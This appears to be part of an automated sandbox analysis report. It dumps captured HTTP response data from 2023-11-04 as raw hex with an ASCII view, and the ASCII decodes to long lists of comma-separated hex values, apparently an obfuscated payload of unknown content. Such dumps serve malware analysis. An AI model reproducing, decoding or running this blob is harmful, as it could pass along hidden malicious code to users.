                                                    Data Ascii: 7c,14f,13d,143,a9,144,13d,158,8a,11b,135,165,150,15d,68,128,54,117,123,132,8f,153,138,156,66,129,129,12a,ae,133,132,122,56,14f,13d,143,161,144,62,118,153,11a,135,165,98,15d,12e,168,131,116,123,132,8f,153,138,156,140,128,129,12a,166,133,117,e1,11f,14e,13d,
                                                    2023-11-04 00:30:16 UTC1212INData Raw: 65 2c 31 36 38 2c 31 33 34 2c 63 65 2c 31 32 33 2c 31 33 32 2c 66 66 2c 31 35 33 2c 31 33 38 2c 31 35 36 2c 31 32 39 2c 65 30 2c 31 32 39 2c 31 32 61 2c 31 31 65 2c 31 33 33 2c 31 33 32 2c 31 32 32 2c 66 66 2c 31 30 36 2c 31 33 64 2c 31 34 33 2c 31 31 39 2c 31 34 34 2c 31 33 64 2c 31 35 38 2c 66 33 2c 64 32 2c 31 33 35 2c 31 36 35 2c 31 30 38 2c 31 35 64 2c 31 32 65 2c 31 36 38 2c 62 34 2c 63 65 2c 31 32 33 2c 31 33 32 2c 66 66 2c 31 35 33 2c 31 33 38 2c 31 35 36 2c 61 39 2c 65 30 2c 31 32 39 2c 31 32 61 2c 31 31 65 2c 31 33 33 2c 31 33 32 2c 31 32 32 2c 37 66 2c 31 30 36 2c 31 33 64 2c 31 34 33 2c 31 31 39 2c 31 34 34 2c 31 33 64 2c 31 35 38 2c 37 33 2c 64 32 2c 31 33 35 2c 31 36 35 2c 31 30 38 2c 31 35 64 2c 31 32 65 2c 31 36 38 2c 31 33 34 2c 63 64 2c
                                                    Data Ascii: e,168,134,ce,123,132,ff,153,138,156,129,e0,129,12a,11e,133,132,122,ff,106,13d,143,119,144,13d,158,f3,d2,135,165,108,15d,12e,168,b4,ce,123,132,ff,153,138,156,a9,e0,129,12a,11e,133,132,122,7f,106,13d,143,119,144,13d,158,73,d2,135,165,108,15d,12e,168,134,cd,
                                                    2023-11-04 00:30:16 UTC1228INData Raw: 33 2c 31 33 32 2c 31 32 32 2c 37 66 2c 63 35 2c 31 33 64 2c 31 34 33 2c 31 31 39 2c 31 34 34 2c 31 33 64 2c 31 35 38 2c 37 33 2c 39 31 2c 31 33 35 2c 31 36 35 2c 31 30 38 2c 31 35 64 2c 31 32 65 2c 31 36 38 2c 31 33 34 2c 38 63 2c 31 32 33 2c 31 33 32 2c 66 66 2c 31 35 33 2c 31 33 38 2c 31 35 36 2c 31 32 39 2c 39 65 2c 31 32 39 2c 31 32 61 2c 31 31 65 2c 31 33 33 2c 31 33 32 2c 31 32 32 2c 66 66 2c 63 34 2c 31 33 64 2c 31 34 33 2c 31 31 39 2c 31 34 34 2c 31 33 64 2c 31 35 38 2c 66 33 2c 39 30 2c 31 33 35 2c 31 36 35 2c 31 30 38 2c 31 35 64 2c 31 32 65 2c 31 36 38 2c 62 34 2c 38 63 2c 31 32 33 2c 31 33 32 2c 66 66 2c 31 35 33 2c 31 33 38 2c 31 35 36 2c 61 39 2c 39 65 2c 31 32 39 2c 31 32 61 2c 31 31 65 2c 31 33 33 2c 31 33 32 2c 31 32 32 2c 37 66 2c 63 34
                                                    Data Ascii: 3,132,122,7f,c5,13d,143,119,144,13d,158,73,91,135,165,108,15d,12e,168,134,8c,123,132,ff,153,138,156,129,9e,129,12a,11e,133,132,122,ff,c4,13d,143,119,144,13d,158,f3,90,135,165,108,15d,12e,168,b4,8c,123,132,ff,153,138,156,a9,9e,129,12a,11e,133,132,122,7f,c4
                                                    2023-11-04 00:30:16 UTC1244INData Raw: 31 36 38 2c 35 34 2c 34 62 2c 31 32 33 2c 31 33 32 2c 66 66 2c 31 35 33 2c 31 33 38 2c 31 35 36 2c 31 34 39 2c 35 63 2c 31 32 39 2c 31 32 61 2c 31 31 65 2c 31 33 33 2c 31 33 32 2c 31 32 32 2c 31 31 66 2c 38 32 2c 31 33 64 2c 31 34 33 2c 31 31 39 2c 31 34 34 2c 31 33 64 2c 31 35 38 2c 31 31 33 2c 34 65 2c 31 33 35 2c 31 36 35 2c 31 30 38 2c 31 35 64 2c 31 32 65 2c 31 36 38 2c 64 34 2c 34 61 2c 31 32 33 2c 31 33 32 2c 66 66 2c 31 35 33 2c 31 33 38 2c 31 35 36 2c 63 39 2c 35 63 2c 31 32 39 2c 31 32 61 2c 31 31 65 2c 31 33 33 2c 31 33 32 2c 31 32 32 2c 39 66 2c 38 32 2c 31 33 64 2c 31 34 33 2c 31 31 39 2c 31 34 34 2c 31 33 64 2c 31 35 38 2c 39 33 2c 34 65 2c 31 33 35 2c 31 36 35 2c 31 30 38 2c 31 35 64 2c 31 32 65 2c 31 36 38 2c 35 34 2c 34 61 2c 31 32 33 2c
                                                    Data Ascii: 168,54,4b,123,132,ff,153,138,156,149,5c,129,12a,11e,133,132,122,11f,82,13d,143,119,144,13d,158,113,4e,135,165,108,15d,12e,168,d4,4a,123,132,ff,153,138,156,c9,5c,129,12a,11e,133,132,122,9f,82,13d,143,119,144,13d,158,93,4e,135,165,108,15d,12e,168,54,4a,123,
                                                    2023-11-04 00:30:16 UTC1260INData Raw: 30 64 2c 63 65 2c 62 62 2c 64 62 2c 63 36 2c 66 64 2c 39 65 2c 66 66 2c 38 36 2c 65 30 2c 34 63 2c 64 33 2c 31 36 62 2c 64 64 2c 31 33 64 2c 63 61 2c 31 32 37 2c 31 30 35 2c 63 35 2c 65 62 2c 62 39 2c 65 64 2c 37 66 2c 31 30 30 2c 31 30 37 2c 64 30 2c 64 62 2c 31 30 63 2c 65 38 2c 31 30 35 2c 63 32 2c 31 30 66 2c 38 39 2c 63 63 2c 36 64 2c 64 39 2c 37 38 2c 66 62 2c 36 64 2c 66 64 2c 36 31 2c 64 65 2c 31 33 36 2c 64 31 2c 31 36 33 2c 64 62 2c 31 33 33 2c 63 38 2c 31 32 30 2c 31 30 33 2c 31 31 33 2c 65 39 2c 31 32 37 2c 65 62 2c 31 30 34 2c 66 65 2c 31 30 31 2c 63 66 2c 62 38 2c 31 30 62 2c 63 33 2c 31 30 34 2c 39 61 2c 31 30 65 2c 35 63 2c 63 62 2c 66 66 2c 64 37 2c 31 30 39 2c 66 39 2c 66 31 2c 66 62 2c 64 38 2c 64 63 2c 61 34 2c 63 66 2c 63 38 2c 64 39
                                                    Data Ascii: 0d,ce,bb,db,c6,fd,9e,ff,86,e0,4c,d3,16b,dd,13d,ca,127,105,c5,eb,b9,ed,7f,100,107,d0,db,10c,e8,105,c2,10f,89,cc,6d,d9,78,fb,6d,fd,61,de,136,d1,163,db,133,c8,120,103,113,e9,127,eb,104,fe,101,cf,b8,10b,c3,104,9a,10e,5c,cb,ff,d7,109,f9,f1,fb,d8,dc,a4,cf,c8,d9
                                                    2023-11-04 00:30:16 UTC1276INData Raw: 32 2c 31 33 66 2c 31 35 64 2c 31 33 63 2c 31 34 33 2c 61 37 2c 65 66 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 31 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 32 33 2c 31 35 35 2c 63 35 2c 62 35 2c 31 32 39 2c 31 32 61 2c 31 36 31 2c 31 33 34 2c 31 34 30 2c 31 32 32 2c 31 33 66 2c 31 35 64 2c 31 33 63 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 63 35 2c 65 62 2c 31 35 33 2c 31 32 39 2c 31 33 33 2c 31 36 35 2c 31 34 61 2c 31 35 65 2c 31 33 39 2c 31 36 38 2c 31 33 33 2c 31 32 35 2c 31 31 66 2c 31 33 32 2c 31 34 31 2c 31 35 34 2c 31 34 31 2c 31 35 36 2c 31 34 38 2c 31 33 37 2c 31 32 33 2c 31 32 61 2c 31 35 63 2c 31 33 34 2c 31 33 39 2c 31 32 32 2c 31 33 61
                                                    Data Ascii: 2,13f,15d,13c,143,a7,ef,14b,158,153,129,131,165,14b,15e,13c,168,134,125,123,132,142,154,123,155,c5,b5,129,12a,161,134,140,122,13f,15d,13c,143,15c,145,c5,eb,153,129,133,165,14a,15e,139,168,133,125,11f,132,141,154,141,156,148,137,123,12a,15c,134,139,122,13a
                                                    2023-11-04 00:30:16 UTC1292INData Raw: 66 37 2c 31 31 33 2c 31 31 62 2c 31 35 38 2c 31 30 36 2c 64 36 2c 65 36 2c 31 30 33 2c 65 31 2c 66 39 2c 64 39 2c 66 34 2c 31 30 32 2c 66 35 2c 31 32 33 2c 64 33 2c 65 33 2c 31 30 31 2c 64 32 2c 66 35 2c 64 35 2c 63 65 2c 63 36 2c 65 39 2c 65 66 2c 63 32 2c 64 66 2c 61 39 2c 66 36 2c 65 66 2c 64 34 2c 63 66 2c 31 30 38 2c 63 63 2c 64 62 2c 66 33 2c 31 30 30 2c 63 30 2c 62 62 2c 31 30 30 2c 31 30 65 2c 31 32 62 2c 31 30 63 2c 31 36 38 2c 66 38 2c 65 37 2c 62 34 2c 64 33 2c 65 33 2c 31 32 31 2c 31 31 36 2c 31 35 36 2c 65 61 2c 64 38 2c 64 36 2c 62 36 2c 31 30 30 2c 63 30 2c 64 37 2c 62 66 2c 66 65 2c 65 62 2c 63 62 2c 65 32 2c 65 33 2c 66 63 2c 64 64 2c 65 66 2c 64 66 2c 64 35 2c 62 63 2c 66 35 2c 65 36 2c 31 30 62 2c 64 33 2c 65 65 2c 63 66 2c 65 38 2c 65
                                                    Data Ascii: f7,113,11b,158,106,d6,e6,103,e1,f9,d9,f4,102,f5,123,d3,e3,101,d2,f5,d5,ce,c6,e9,ef,c2,df,a9,f6,ef,d4,cf,108,cc,db,f3,100,c0,bb,100,10e,12b,10c,168,f8,e7,b4,d3,e3,121,116,156,ea,d8,d6,b6,100,c0,d7,bf,fe,eb,cb,e2,e3,fc,dd,ef,df,d5,bc,f5,e6,10b,d3,ee,cf,e8,e
                                                    2023-11-04 00:30:16 UTC1308INData Raw: 64 2c 66 63 2c 64 61 2c 63 66 2c 66 33 2c 64 36 2c 64 64 2c 31 31 61 2c 66 31 2c 63 61 2c 64 36 2c 31 33 34 2c 31 34 62 2c 31 32 32 2c 31 30 65 2c 31 30 35 2c 64 31 2c 62 31 2c 62 34 2c 63 30 2c 31 30 34 2c 66 32 2c 65 37 2c 66 37 2c 31 31 38 2c 31 33 37 2c 65 64 2c 65 63 2c 66 31 2c 64 35 2c 65 31 2c 66 31 2c 31 33 66 2c 31 32 31 2c 66 66 2c 65 30 2c 66 64 2c 65 36 2c 31 30 37 2c 65 66 2c 65 30 2c 62 39 2c 63 39 2c 31 30 34 2c 64 32 2c 31 31 62 2c 64 30 2c 31 30 37 2c 63 31 2c 62 32 2c 65 66 2c 66 62 2c 31 31 31 2c 66 35 2c 31 31 36 2c 66 36 2c 31 31 38 2c 31 33 37 2c 65 64 2c 65 63 2c 66 65 2c 64 35 2c 65 31 2c 64 65 2c 64 36 2c 65 61 2c 63 64 2c 64 37 2c 66 62 2c 63 63 2c 31 30 38 2c 65 63 2c 66 32 2c 62 36 2c 63 32 2c 31 33 34 2c 65 63 2c 31 32 65 2c
                                                    Data Ascii: d,fc,da,cf,f3,d6,dd,11a,f1,ca,d6,134,14b,122,10e,105,d1,b1,b4,c0,104,f2,e7,f7,118,137,ed,ec,f1,d5,e1,f1,13f,121,ff,e0,fd,e6,107,ef,e0,b9,c9,104,d2,11b,d0,107,c1,b2,ef,fb,111,f5,116,f6,118,137,ed,ec,fe,d5,e1,de,d6,ea,cd,d7,fb,cc,108,ec,f2,b6,c2,134,ec,12e,
                                                    2023-11-04 00:30:16 UTC1324INData Raw: 65 66 2c 64 38 2c 31 30 33 2c 64 30 2c 31 32 35 2c 62 61 2c 62 66 2c 31 30 30 2c 65 66 2c 64 64 2c 65 38 2c 65 32 2c 66 33 2c 62 37 2c 63 39 2c 66 61 2c 63 64 2c 64 62 2c 62 65 2c 31 33 66 2c 31 30 65 2c 63 66 2c 66 30 2c 66 33 2c 63 62 2c 65 36 2c 31 31 35 2c 65 62 2c 63 38 2c 63 37 2c 66 65 2c 65 36 2c 66 61 2c 31 33 63 2c 31 31 39 2c 63 36 2c 64 66 2c 62 34 2c 63 30 2c 64 64 2c 31 31 31 2c 64 37 2c 65 61 2c 64 61 2c 63 35 2c 65 36 2c 63 32 2c 31 30 30 2c 63 36 2c 64 39 2c 62 64 2c 64 62 2c 31 35 64 2c 65 65 2c 64 35 2c 31 31 36 2c 64 36 2c 64 64 2c 65 34 2c 31 31 30 2c 63 31 2c 64 34 2c 66 37 2c 65 34 2c 66 39 2c 64 38 2c 31 36 38 2c 64 33 2c 63 31 2c 62 66 2c 64 33 2c 65 65 2c 65 66 2c 63 65 2c 65 32 2c 31 30 36 2c 63 66 2c 63 38 2c 62 63 2c 66 61 2c
                                                    Data Ascii: ef,d8,103,d0,125,ba,bf,100,ef,dd,e8,e2,f3,b7,c9,fa,cd,db,be,13f,10e,cf,f0,f3,cb,e6,115,eb,c8,c7,fe,e6,fa,13c,119,c6,df,b4,c0,dd,111,d7,ea,da,c5,e6,c2,100,c6,d9,bd,db,15d,ee,d5,116,d6,dd,e4,110,c1,d4,f7,e4,f9,d8,168,d3,c1,bf,d3,ee,ef,ce,e2,106,cf,c8,bc,fa,
                                                    2023-11-04 00:30:16 UTC1340INData Raw: 65 36 2c 62 39 2c 64 34 2c 66 33 2c 65 36 2c 31 35 65 2c 64 39 2c 66 39 2c 63 37 2c 62 35 2c 63 32 2c 63 30 2c 64 64 2c 31 35 34 2c 66 34 2c 66 31 2c 64 63 2c 63 38 2c 62 33 2c 63 35 2c 31 30 61 2c 63 63 2c 64 62 2c 62 30 2c 64 61 2c 31 35 64 2c 66 39 2c 64 65 2c 66 30 2c 65 30 2c 64 37 2c 66 33 2c 31 30 66 2c 63 30 2c 63 33 2c 31 30 30 2c 65 38 2c 65 61 2c 63 64 2c 66 36 2c 63 62 2c 63 30 2c 62 30 2c 64 62 2c 64 61 2c 65 66 2c 64 34 2c 66 31 2c 31 34 39 2c 66 30 2c 63 34 2c 62 36 2c 31 31 64 2c 63 62 2c 63 65 2c 62 64 2c 64 63 2c 65 39 2c 63 65 2c 64 31 2c 66 33 2c 65 30 2c 64 38 2c 31 30 31 2c 65 62 2c 63 34 2c 63 33 2c 31 30 30 2c 31 34 62 2c 31 31 37 2c 64 37 2c 66 34 2c 65 65 2c 62 63 2c 62 37 2c 63 64 2c 65 66 2c 64 62 2c 64 33 2c 65 32 2c 65 34 2c
                                                    Data Ascii: e6,b9,d4,f3,e6,15e,d9,f9,c7,b5,c2,c0,dd,154,f4,f1,dc,c8,b3,c5,10a,cc,db,b0,da,15d,f9,de,f0,e0,d7,f3,10f,c0,c3,100,e8,ea,cd,f6,cb,c0,b0,db,da,ef,d4,f1,149,f0,c4,b6,11d,cb,ce,bd,dc,e9,ce,d1,f3,e0,d8,101,eb,c4,c3,100,14b,117,d7,f4,ee,bc,b7,cd,ef,db,d3,e2,e4,
                                                    2023-11-04 00:30:16 UTC1356INData Raw: 64 30 2c 66 66 2c 63 66 2c 62 37 2c 61 66 2c 65 66 2c 64 30 2c 65 66 2c 65 32 2c 66 31 2c 64 62 2c 63 33 2c 63 30 2c 63 39 2c 66 35 2c 31 33 34 2c 66 37 2c 61 66 2c 65 39 2c 66 63 2c 64 31 2c 64 61 2c 66 38 2c 31 30 31 2c 65 36 2c 66 35 2c 65 61 2c 62 63 2c 64 34 2c 66 39 2c 31 34 62 2c 31 30 61 2c 63 64 2c 31 31 61 2c 62 66 2c 62 39 2c 62 37 2c 64 31 2c 65 30 2c 65 38 2c 65 31 2c 31 31 32 2c 65 34 2c 64 34 2c 63 30 2c 62 64 2c 31 30 30 2c 63 38 2c 31 34 30 2c 63 65 2c 64 30 2c 31 31 39 2c 64 38 2c 65 30 2c 66 33 2c 64 38 2c 65 61 2c 65 63 2c 31 35 33 2c 65 34 2c 62 64 2c 66 31 2c 64 39 2c 66 64 2c 64 39 2c 66 34 2c 66 30 2c 63 30 2c 63 30 2c 63 39 2c 64 35 2c 66 33 2c 64 61 2c 31 35 36 2c 31 30 34 2c 62 66 2c 62 35 2c 62 38 2c 31 30 30 2c 64 31 2c 63 63
                                                    Data Ascii: d0,ff,cf,b7,af,ef,d0,ef,e2,f1,db,c3,c0,c9,f5,134,f7,af,e9,fc,d1,da,f8,101,e6,f5,ea,bc,d4,f9,14b,10a,cd,11a,bf,b9,b7,d1,e0,e8,e1,112,e4,d4,c0,bd,100,c8,140,ce,d0,119,d8,e0,f3,d8,ea,ec,153,e4,bd,f1,d9,fd,d9,f4,f0,c0,c0,c9,d5,f3,da,156,104,bf,b5,b8,100,d1,cc
                                                    2023-11-04 00:30:16 UTC1372INData Raw: 2c 62 65 2c 63 30 2c 31 34 32 2c 31 30 35 2c 64 36 2c 66 31 2c 64 62 2c 66 36 2c 62 64 2c 63 33 2c 66 32 2c 63 32 2c 64 37 2c 61 65 2c 64 37 2c 66 30 2c 65 64 2c 64 31 2c 65 64 2c 63 66 2c 65 32 2c 66 34 2c 65 65 2c 62 37 2c 31 33 35 2c 31 31 63 2c 31 30 35 2c 65 66 2c 63 61 2c 66 62 2c 64 33 2c 62 31 2c 64 33 2c 63 30 2c 64 33 2c 64 65 2c 64 64 2c 66 32 2c 65 34 2c 63 35 2c 31 32 39 2c 62 61 2c 65 66 2c 63 35 2c 63 61 2c 62 39 2c 64 62 2c 66 38 2c 63 62 2c 31 34 33 2c 31 31 35 2c 65 30 2c 64 37 2c 31 30 35 2c 64 66 2c 62 37 2c 63 63 2c 66 37 2c 65 34 2c 31 31 63 2c 63 37 2c 66 66 2c 63 38 2c 63 31 2c 62 65 2c 63 30 2c 31 34 32 2c 66 30 2c 65 35 2c 65 32 2c 65 38 2c 66 31 2c 62 61 2c 62 65 2c 66 64 2c 63 66 2c 63 65 2c 31 32 32 2c 65 63 2c 65 64 2c 64 38
                                                    Data Ascii: ,be,c0,142,105,d6,f1,db,f6,bd,c3,f2,c2,d7,ae,d7,f0,ed,d1,ed,cf,e2,f4,ee,b7,135,11c,105,ef,ca,fb,d3,b1,d3,c0,d3,de,dd,f2,e4,c5,129,ba,ef,c5,ca,b9,db,f8,cb,143,115,e0,d7,105,df,b7,cc,f7,e4,11c,c7,ff,c8,c1,be,c0,142,f0,e5,e2,e8,f1,ba,be,fd,cf,ce,122,ec,ed,d8
                                                    2023-11-04 00:30:16 UTC1388INData Raw: 34 2c 65 65 2c 64 32 2c 64 37 2c 65 36 2c 66 32 2c 63 30 2c 63 37 2c 66 31 2c 64 38 2c 31 35 65 2c 63 63 2c 31 30 37 2c 63 32 2c 62 31 2c 62 30 2c 31 33 32 2c 65 66 2c 64 66 2c 64 36 2c 65 36 2c 64 61 2c 63 35 2c 62 35 2c 62 37 2c 31 36 31 2c 63 35 2c 63 63 2c 62 61 2c 64 61 2c 65 62 2c 66 31 2c 64 61 2c 65 39 2c 64 31 2c 64 38 2c 31 35 38 2c 65 63 2c 63 34 2c 63 31 2c 31 30 36 2c 31 30 36 2c 65 36 2c 64 33 2c 66 35 2c 63 30 2c 62 32 2c 31 32 33 2c 65 65 2c 64 33 2c 65 37 2c 65 35 2c 65 64 2c 64 62 2c 66 32 2c 62 31 2c 63 31 2c 65 65 2c 63 30 2c 63 64 2c 31 32 32 2c 66 61 2c 65 66 2c 63 61 2c 63 65 2c 65 61 2c 65 30 2c 31 30 37 2c 65 66 2c 65 31 2c 63 34 2c 64 32 2c 66 31 2c 64 63 2c 65 63 2c 63 33 2c 31 32 33 2c 62 63 2c 62 63 2c 62 30 2c 62 65 2c 63 66
                                                    Data Ascii: 4,ee,d2,d7,e6,f2,c0,c7,f1,d8,15e,cc,107,c2,b1,b0,132,ef,df,d6,e6,da,c5,b5,b7,161,c5,cc,ba,da,eb,f1,da,e9,d1,d8,158,ec,c4,c1,106,106,e6,d3,f5,c0,b2,123,ee,d3,e7,e5,ed,db,f2,b1,c1,ee,c0,cd,122,fa,ef,ca,ce,ea,e0,107,ef,e1,c4,d2,f1,dc,ec,c3,123,bc,bc,b0,be,cf
                                                    2023-11-04 00:30:16 UTC1404INData Raw: 64 33 2c 64 39 2c 66 37 2c 64 61 2c 31 32 39 2c 63 65 2c 31 30 30 2c 64 37 2c 66 66 2c 66 33 2c 66 35 2c 66 33 2c 62 33 2c 62 31 2c 64 31 2c 63 39 2c 31 35 34 2c 64 37 2c 65 31 2c 64 35 2c 66 36 2c 62 37 2c 62 38 2c 31 30 30 2c 62 62 2c 31 34 30 2c 63 31 2c 63 64 2c 65 62 2c 64 63 2c 63 61 2c 31 35 63 2c 31 30 32 2c 65 61 2c 66 35 2c 65 62 2c 63 34 2c 65 63 2c 66 31 2c 65 36 2c 66 31 2c 65 63 2c 66 39 2c 63 38 2c 62 63 2c 63 30 2c 62 39 2c 31 34 32 2c 65 34 2c 64 37 2c 65 61 2c 65 30 2c 64 34 2c 62 30 2c 31 32 61 2c 31 31 62 2c 63 32 2c 64 31 2c 62 35 2c 66 30 2c 31 31 63 2c 66 61 2c 63 65 2c 65 61 2c 64 33 2c 65 36 2c 65 61 2c 66 30 2c 62 30 2c 31 33 35 2c 31 31 31 2c 64 63 2c 31 30 66 2c 66 62 2c 31 32 35 2c 62 66 2c 62 33 2c 62 31 2c 63 64 2c 64 34 2c
                                                    Data Ascii: d3,d9,f7,da,129,ce,100,d7,ff,f3,f5,f3,b3,b1,d1,c9,154,d7,e1,d5,f6,b7,b8,100,bb,140,c1,cd,eb,dc,ca,15c,102,ea,f5,eb,c4,ec,f1,e6,f1,ec,f9,c8,bc,c0,b9,142,e4,d7,ea,e0,d4,b0,12a,11b,c2,d1,b5,f0,11c,fa,ce,ea,d3,e6,ea,f0,b0,135,111,dc,10f,fb,125,bf,b3,b1,cd,d4,
                                                    2023-11-04 00:30:16 UTC1420INData Raw: 64 33 2c 39 61 2c 35 33 2c 65 34 2c 61 31 2c 37 63 2c 62 62 2c 62 64 2c 35 32 2c 61 35 2c 39 38 2c 35 30 2c 63 31 2c 61 37 2c 36 34 2c 64 36 2c 39 66 2c 35 35 2c 61 39 2c 37 63 2c 31 36 31 2c 35 32 2c 62 66 2c 37 35 2c 35 64 2c 64 64 2c 62 30 2c 36 31 2c 64 63 2c 39 37 2c 36 39 2c 64 38 2c 63 34 2c 34 37 2c 62 34 2c 62 62 2c 36 39 2c 64 65 2c 62 31 2c 38 36 2c 62 34 2c 37 62 2c 34 31 2c 62 32 2c 39 35 2c 37 32 2c 63 36 2c 61 39 2c 36 37 2c 62 36 2c 37 63 2c 34 38 2c 65 30 2c 38 35 2c 35 65 2c 61 32 2c 62 33 2c 37 62 2c 62 63 2c 39 35 2c 37 61 2c 63 34 2c 39 66 2c 37 36 2c 64 33 2c 37 65 2c 35 33 2c 65 35 2c 62 66 2c 37 63 2c 62 63 2c 64 39 2c 35 32 2c 61 34 2c 37 36 2c 35 30 2c 63 31 2c 61 61 2c 36 34 2c 64 36 2c 39 63 2c 35 35 2c 61 39 2c 39 65 2c 37 66
                                                    Data Ascii: d3,9a,53,e4,a1,7c,bb,bd,52,a5,98,50,c1,a7,64,d6,9f,55,a9,7c,161,52,bf,75,5d,dd,b0,61,dc,97,69,d8,c4,47,b4,bb,69,de,b1,86,b4,7b,41,b2,95,72,c6,a9,67,b6,7c,48,e0,85,5e,a2,b3,7b,bc,95,7a,c4,9f,76,d3,7e,53,e5,bf,7c,bc,d9,52,a4,76,50,c1,aa,64,d6,9c,55,a9,9e,7f
                                                    2023-11-04 00:30:16 UTC1436INData Raw: 2c 65 37 2c 38 35 2c 34 33 2c 61 33 2c 38 35 2c 36 30 2c 64 34 2c 39 61 2c 37 34 2c 63 38 2c 38 61 2c 34 37 2c 61 61 2c 62 33 2c 31 33 34 2c 35 65 2c 61 31 2c 39 35 2c 37 62 2c 62 63 2c 39 38 2c 37 61 2c 63 35 2c 39 65 2c 37 36 2c 64 33 2c 37 66 2c 35 33 2c 65 34 2c 39 64 2c 37 63 2c 62 63 2c 62 63 2c 35 32 2c 61 34 2c 37 36 2c 35 30 2c 63 32 2c 61 37 2c 36 34 2c 64 36 2c 62 62 2c 35 35 2c 61 38 2c 37 63 2c 37 66 2c 62 33 2c 39 36 2c 34 30 2c 62 65 2c 62 31 2c 35 62 2c 63 32 2c 62 30 2c 36 33 2c 63 62 2c 61 61 2c 37 31 2c 61 39 2c 61 36 2c 38 33 2c 63 62 2c 64 32 2c 35 61 2c 65 37 2c 38 36 2c 34 33 2c 61 33 2c 61 35 2c 36 30 2c 64 33 2c 39 37 2c 37 34 2c 63 39 2c 61 62 2c 34 37 2c 61 61 2c 62 35 2c 35 32 2c 62 66 2c 37 35 2c 35 64 2c 64 64 2c 39 33 2c 36
                                                    Data Ascii: ,e7,85,43,a3,85,60,d4,9a,74,c8,8a,47,aa,b3,134,5e,a1,95,7b,bc,98,7a,c5,9e,76,d3,7f,53,e4,9d,7c,bc,bc,52,a4,76,50,c2,a7,64,d6,bb,55,a8,7c,7f,b3,96,40,be,b1,5b,c2,b0,63,cb,aa,71,a9,a6,83,cb,d2,5a,e7,86,43,a3,a5,60,d3,97,74,c9,ab,47,aa,b5,52,bf,75,5d,dd,93,6
                                                    2023-11-04 00:30:16 UTC1452INData Raw: 33 66 2c 31 35 63 2c 31 33 63 2c 31 33 33 2c 31 34 61 2c 63 35 2c 38 62 2c 31 35 32 2c 31 34 62 2c 31 32 39 2c 31 31 38 2c 31 35 33 2c 63 62 2c 39 61 2c 31 33 38 2c 31 36 32 2c 31 32 32 2c 61 35 2c 33 32 2c 31 32 63 2c 31 32 32 2c 31 35 33 2c 31 33 65 2c 31 34 34 2c 63 39 2c 37 33 2c 31 31 32 2c 31 32 34 2c 31 34 63 2c 31 32 32 2c 63 30 2c 37 31 2c 31 33 65 2c 31 34 38 2c 31 32 62 2c 63 33 2c 31 36 37 2c 31 34 32 2c 31 33 39 2c 64 38 2c 39 61 2c 31 31 34 2c 31 32 33 2c 65 35 2c 61 61 2c 31 35 64 2c 31 32 61 2c 65 36 2c 35 30 2c 31 30 39 2c 31 32 31 2c 31 32 63 2c 31 33 37 2c 31 35 31 2c 31 34 30 2c 31 33 39 2c 31 33 62 2c 31 33 32 2c 31 32 33 2c 31 30 64 2c 31 35 30 2c 62 32 2c 35 30 2c 31 31 64 2c 31 33 39 2c 31 34 30 2c 31 32 63 2c 63 31 2c 31 36 38 2c
                                                    Data Ascii: 3f,15c,13c,133,14a,c5,8b,152,14b,129,118,153,cb,9a,138,162,122,a5,32,12c,122,153,13e,144,c9,73,112,124,14c,122,c0,71,13e,148,12b,c3,167,142,139,d8,9a,114,123,e5,aa,15d,12a,e6,50,109,121,12c,137,151,140,139,13b,132,123,10d,150,b2,50,11d,139,140,12c,c1,168,
                                                    2023-11-04 00:30:16 UTC1468INData Raw: 36 2c 31 31 65 2c 31 30 65 2c 31 34 63 2c 31 32 32 2c 63 30 2c 37 39 2c 31 33 65 2c 31 34 38 2c 31 32 63 2c 63 32 2c 31 35 33 2c 31 34 34 2c 31 34 30 2c 31 35 34 2c 31 35 33 2c 31 32 38 2c 31 33 31 2c 31 34 39 2c 31 34 36 2c 31 35 65 2c 31 33 61 2c 31 36 34 2c 31 31 38 2c 31 32 31 2c 31 31 64 2c 31 33 32 2c 31 33 66 2c 31 35 30 2c 31 32 61 2c 31 35 32 2c 31 34 37 2c 31 32 64 2c 31 32 39 2c 31 32 38 2c 31 35 64 2c 31 31 38 2c 31 32 62 2c 31 31 30 2c 62 66 2c 62 34 2c 31 33 63 2c 31 33 66 2c 31 35 31 2c 31 34 35 2c 31 34 38 2c 31 35 34 2c 31 33 37 2c 31 31 34 2c 31 32 33 2c 65 35 2c 61 32 2c 31 35 64 2c 31 33 38 2c 31 36 36 2c 31 32 66 2c 31 32 35 2c 31 32 31 2c 31 32 34 2c 31 32 36 2c 31 34 36 2c 31 34 30 2c 31 35 36 2c 31 34 36 2c 31 32 39 2c 31 30 64 2c
                                                    Data Ascii: 6,11e,10e,14c,122,c0,79,13e,148,12c,c2,153,144,140,154,153,128,131,149,146,15e,13a,164,118,121,11d,132,13f,150,12a,152,147,12d,129,128,15d,118,12b,110,bf,b4,13c,13f,151,145,148,154,137,114,123,e5,a2,15d,138,166,12f,125,121,124,126,146,140,156,146,129,10d,
                                                    2023-11-04 00:30:16 UTC1484INData Raw: 31 33 39 2c 64 38 2c 38 61 2c 31 32 32 2c 31 33 35 2c 31 36 33 2c 31 34 61 2c 31 34 63 2c 62 63 2c 39 66 2c 31 32 36 2c 31 31 64 2c 31 32 33 2c 31 32 66 2c 31 34 31 2c 31 34 32 2c 63 36 2c 38 64 2c 31 33 62 2c 31 32 39 2c 31 31 66 2c 31 32 61 2c 31 35 65 2c 31 33 33 2c 31 32 65 2c 61 32 2c 37 36 2c 31 34 66 2c 31 32 63 2c 63 33 2c 38 37 2c 31 33 61 2c 31 34 62 2c 31 35 34 2c 31 35 32 2c 31 31 37 2c 62 35 2c 39 63 2c 31 33 64 2c 31 35 30 2c 31 32 62 2c 65 38 2c 35 66 2c 31 31 64 2c 31 32 33 2c 31 33 31 2c 31 33 30 2c 64 34 2c 37 64 2c 31 34 34 2c 63 39 2c 36 65 2c 31 31 65 2c 31 32 61 2c 31 35 66 2c 31 32 32 2c 63 30 2c 35 39 2c 31 32 64 2c 64 64 2c 37 34 2c 31 33 31 2c 64 61 2c 31 31 34 2c 31 33 63 2c 31 35 38 2c 31 35 31 2c 31 32 38 2c 31 32 33 2c 65 35
